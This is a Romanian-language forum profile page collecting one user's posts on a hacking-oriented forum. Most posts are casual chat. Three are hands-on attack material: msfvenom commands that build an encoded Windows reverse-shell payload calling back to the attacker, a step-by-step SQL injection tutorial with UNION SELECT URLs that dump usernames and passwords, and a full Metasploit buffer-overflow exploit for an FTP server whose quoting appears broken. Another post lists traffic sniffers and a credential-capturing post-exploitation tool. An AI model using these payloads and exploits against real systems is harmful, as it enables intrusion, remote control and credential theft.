Jump to content

mDOS

Active Members
  • Posts

    111
  • Joined

  • Last visited

  • Days Won

    6

Everything posted by mDOS

  1. Nu cred ca o sa ma satur niciodata de gluma asta >))
  2. Mi se pare foarte interesant conceprul, dar noi folosim aceste aplicatii sa dam hate la alte persoane anonimi. Din cate stiu mai sunt 2 aplicatii: -Tellonym -Sarahah
  3. Odata intrat acolo nu mai e scapare sa stii.Am supravietuit doar o saptamana pe acolo :)))
  4. mDOS

    ECSC

    Avem pe cineva din echipa pe aici??
  5. mDOS

    Parole SSH

    ana.este.o.dulceata.de.fata.2011 asta e cea mai buna combinatie de parola :)
  6. <website>https://android-1.com/en/tags/MOD/ <app>https://gameguardian.net/download <app> https://www.luckypatchers.com/download/ <app> https://www.tutuapp.vip/pc/
  7. Dastea faci??
  8. E luat de pe ceva site :)))
  9. Din cate stiu merge, dar mai tarziu o sa iti trimita cate un email in care sa il confirmi numarul.
  10. Pentru inceput o sa introducem urmatoarea comanda: msfvenom -p windows/shell_reverse_tcp LHOST=<ip-ul tau> LPORT<portul tau> -f c exemplu 1> https://imgur.com/eogvBKp Acum trebuie sa extracem caracterele proaste care impiedica shellcode-ul nostru sa ruleze corect. Exemple de caractere: 0x00 NULL (\0) 0x09 Tab (\t) 0x0a Line Feed (\n) 0x0d Carriage Return (\r) 0xff Form Feed (\f) Pentru a extrage aceste caractere rulam urmatoarea comanda: msfvenom -p windows/shell_reverse_tcp LHOST=<ip-ul tau> LPORT<portul tau> -F C -e x86/shikata_ga_nai -b "\x00" exemplu 2 > https://imgur.com/Kh8jg5y Peste cateva zile o sa mai fac un tutorial, dar fara "msfvenom".
  11. O sa pretind ca nu am ajuns pe aici
  12. Ai explicat fain,Felicitari si bine ai venit.Incearca sa postezi ceva continut mai ok si nineni nu o sa mai zica nimic.BAFTA!
  13. Acum m-as gandii sa intarat cu o expresie din asta : Moama ce ti-a zis, eu nu ii permiteam.Dar mai oamenilor haideti sa ne intelelem si noi si sa nu ne mai laudam cu ce avem si ce facem. Toti aici suntem egali, dar poate in viata reala unul este mai sus decat altul.Eu am venit aici sa postez proiecte de ale mele, cat si sa invat ceva.Si eu la primele post-uri am luat Hate , dar nu m-am lasat si am mai postat intre timp cate ceva.Dupa ce ca multii dintre utilizatorii acestui forum ba sunt guest-uri ba sunt utilizatori intregistrati nu multi comenteaza si dau Vote.
  14. IMEI NUMBER: *#06# SMS INFO: *#9998*746# TEST MODE:*#0*# SOFTWARE INFORMATION: *#1234# DIAGNOSTIC: *#*#4636#*#* HELP MENU: *#9998*4357# JAVA MENU: *#9998*5282# MEMORY STATUS: *#9998*636# FACTORY RESET: *#*#7780#*#* GPS TEST: *#*#1472365#*#* BATERY CODE: *#0228# AUDIO TEST: *#0673# SERVICE MENU: *#0011# VIEW PHONE LOOK STATUS: *#7465625#
  15. Salutare,Cu ce sa te ajutam? @lauryca
  16. mDOS

    test

    Nici macar nu a continuat
  17. mDOS

    test

    XSS TEST? :))))
  18. Da ma da vreau sa il fac si eu mai explicit
  19. Este ok ideea ta, dar totusi ai cumparat un domeniu.Eu in locul tau as incerca sa fac ceva mai creativ decat un site de review-uri la alte host-uri.Incearca sa faci ceva mai "misto" in care sa iti placa sa faci asta si sa ai posibilitatea sa castigi si ceva.
  20. BetterCAP − BetterCAP is a powerful, flexible and portable tool created to perform various types of MITM attacks against a network, manipulate HTTP, HTTPS and TCP traffic in real-time, sniff for credentials, and much more. DOWNLOAD: https://www.bettercap.org/installation/ Wireshark − It is one of the most widely known and used packet sniffers. It offers a tremendous number of features designed to assist in the dissection and analysis of traffic. DOWNLOAD: https://www.wireshark.org/download.html Tcpdump − It is a well-known command-line packet analyzer. It provides the ability to intercept and observe TCP/IP and other packets during transmission over the network. DOWNLOAD: www.tcpdump.org. MSN Sniffer − It is a sniffing utility specifically designed for sniffing traffic generated by the MSN Messenger application. DOWNLOAD:http://www.msnsniffer.com/ EtherApe − It is a Linux/Unix tool designed to display graphically a system's incoming and outgoing connections. DOWNLOAD: https://etherape.sourceforge.io/ EDITED: NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption. DOWNLOAD: https://github.com/NytroRST/NetRipper THANKS TO @Nytro
  21. Interesanta aceasta chestie. Vreau sa fac un tutorial mai detaliat pe forum despre cum se exploateaza
  22. Sa zicem ca aveti un site din programul "Big Bounty" si vreti sa incercati un atac MYSQL. Eu am sa pun urmatorul site fictional: https://victimescu.com/index.php?id=5 Pentru a verifica daca site-ul nostru da o eroare Sql trebuie sa punem dupa parametrul .php?.id=5 semnul ('). Daca acesta este vulnerabil va scrie urmatoarea chestie: You have an error in your SQL syntax; check the manual that corresponds to your….. Continued Daca acesta nu este vulnerabil, site-ul nostru va functiona normal. In continuare trebuie sa mergem cu parametrul (ORDER BY ) ca in pasul de mai sus. - Acesta este folosit pentru a verifica cate coloane se afla pe pagina respectiva in baza de date mySQL. https://victimescu.com/index.php?id=5 ORDER BY 5 - Daca pagina noastra functioneaza perfect normal inseamna ca sunt prezente mai mult de 5 coloane in baza de date. Incercam sa marim numarul cu 10. https://victimescu.com/index.php?id=1 ORDER BY 15- Sa zicem ca acum ne va aparea eroarea care ne indica numarul de coloane prezente. Unknown column ’10’ in ‘order clause’Unknown column ’10’ in ‘order clause’ Sa zicem ca pe site-ul nostru fictional avem prezente 9 coloane. Acum continuam doar cu parametrul (UNION SELECT). https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4,5,6,7,8,9 In continuare trebuie sa apara 2 numere care indica unde facem injectarea. ------------------------------------------------- Un numar din cele 2 va fi boldit. ------------------------------------------------- Sa zicem ca cele 2 numere sunt 5 si 3 iar cel care ne indica baza de date sau coloana unde trebuie facuta injectarea este 5. https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact (table_name),6,7 from information_schema.tables Aceasta comanda ne ajuta sa vedem ce se afla in aceasta baza de date. CHARACTER_SETS,CLIENT_STATISTICS,COLUMNS In continuare pentru a extrage mai multe chestii scriem urmatoarea comanda: https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact (column_name),6,7 from information_schema.columns where table_schema=database()- in continuare o sa ne apara: -useri -parole -email-uri -etc https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact(username,0x3a,password),67 from database- Aceasta comanda a fost folosita pentru a afla parola de la panel. ------------------------------------------------- Deseori parola va fi in format MD5 ------------------------------------------------- Acesta a fost tutorialul si sper sa fie folosit in scopuri bune.
  23. Ba,De fiecare data cand intru pe RST Activity Watcher va vad pe voi cum milogiti invitatii de trackere.Mai usor cu ele. Nu mai merge "pirate bays" si veniti aici?
  24. mDOS

    Root?

    Eu pana acum am avut toate telefoanele mele rootate cu SuperSu,dar din cate am inteles mai exista o aplicatie KingRoot care eate un fel de antivirus si iti rooteaza si telefonul.
  25. Exploit causes the ftp server to crash so adduser, etc. payloads are most effective. require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) super(update_info(info, 'Name' => 'Open & Compact FTPd 1.2 Pre-Authentication Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in the USER verb in Open & Compact FTPd version 1.2. The program will crash once the payload is sent, so bind shell payloads are not effective. }, 'Author' => 'Blake', 'License' => MSF_LICENSE, 'Version' => 'Version 1', 'References' => [ [ 'EDB-ID', '11420'], [ 'URL', 'http://www.exploit-db.com/exploits/11420' ], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 400, 'BadChars' => "\x00\x20\x0a\x0d", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP2/SP3 English', { 'Ret' => 0x00202c42 } ], ], 'DisclosureDate' => 'Feb 12, 2010', 'DefaultTarget' => 0)) end def exploit connect sploit = "\x42\x2c\x20" * 199 sploit << make_nops(10) sploit << payload.encoded print_status("Trying target {target.name<http://target.name>}...") login = "USER + sploit + \r\n" login << "PASS " + rand_text_alphanumeric(12) sock.put(login + "\r\n") handler disconnect end end
×
×
  • Create New...